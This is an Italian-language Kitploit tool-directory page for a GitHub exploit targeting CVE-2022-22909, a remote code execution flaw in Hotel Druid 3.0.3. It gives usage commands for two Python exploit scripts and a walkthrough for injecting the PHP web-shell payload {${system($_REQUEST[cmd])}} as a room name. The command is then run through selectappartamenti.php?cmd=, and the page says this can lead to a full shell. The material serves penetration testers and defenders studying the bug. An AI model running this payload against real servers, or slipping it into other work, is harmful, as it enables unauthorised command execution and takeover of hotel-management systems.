Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-22909 — Exploit basato su Python per l'esecuzione remota di codice in Hotel Druid 3.0.3 (CVE-2022-22909). Inietta payload PHP tramite i nomi delle camere per ottenere l'esecuzione di comandi e l'accesso alla shell su target vulnerabili. | Kitploit
Strumenti/GitHubGitHub/kaal18/cve-2022-22909
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubkaal18/cve-2022-22909

CVE-2022-22909

Exploit basato su Python per l'esecuzione remota di codice in Hotel Druid 3.0.3 (CVE-2022-22909). Inietta payload PHP tramite i nomi delle camere per ottenere l'esecuzione di comandi e l'accesso alla shell su target vulnerabili.

Vedi Repository
2424 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-22909 Hotel Druid 3.0.3 - Esecuzione di codice remoto (RCE)

Exploit by kaal

Exploit

  1. HotelDruidExploit.py

Questo Exploit crea una nuova stanza con il nostro payload PHP come nome della stanza.

Utilizzo : $ ./HotelDruidExploit.py -h

image

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

image


  1. HotelDruidExploitRoom.py

Questo Exploit funziona se conosci già il nome della stanza.

Utilizzo : $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

image


Spiegazione dell'Exploit :

1). Vai alla pagina di Hotel Druid.

2). Clicca su Tables -> Rooms

image

3). Nel campo Create New Room aggiungi il seguente codice php e clicca su Add.

{${system($_REQUEST[cmd])}}

image

4). Vedrai una nuova stanza con il nostro payload nel campo del nome "Room".

image

5). Vai al link qui sotto e otterrai l'esecuzione dei comandi. In seguito potrai ottenere una shell completa.

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

Nota : Sostituisci l'IP con l'IP del tuo target hoteldruid.

Descrizione della vulnerabilità :

Questa vulnerabilità si verifica perché i nomi delle stanze vengono salvati all'interno di /var/www/html/hoteldruid/dati/selectappartamenti.php

image

E selectappartamenti.php è un file PHP, quindi qualsiasi codice PHP presente all'interno di quel file verrà eseguito dal server.

Scarica lo strumento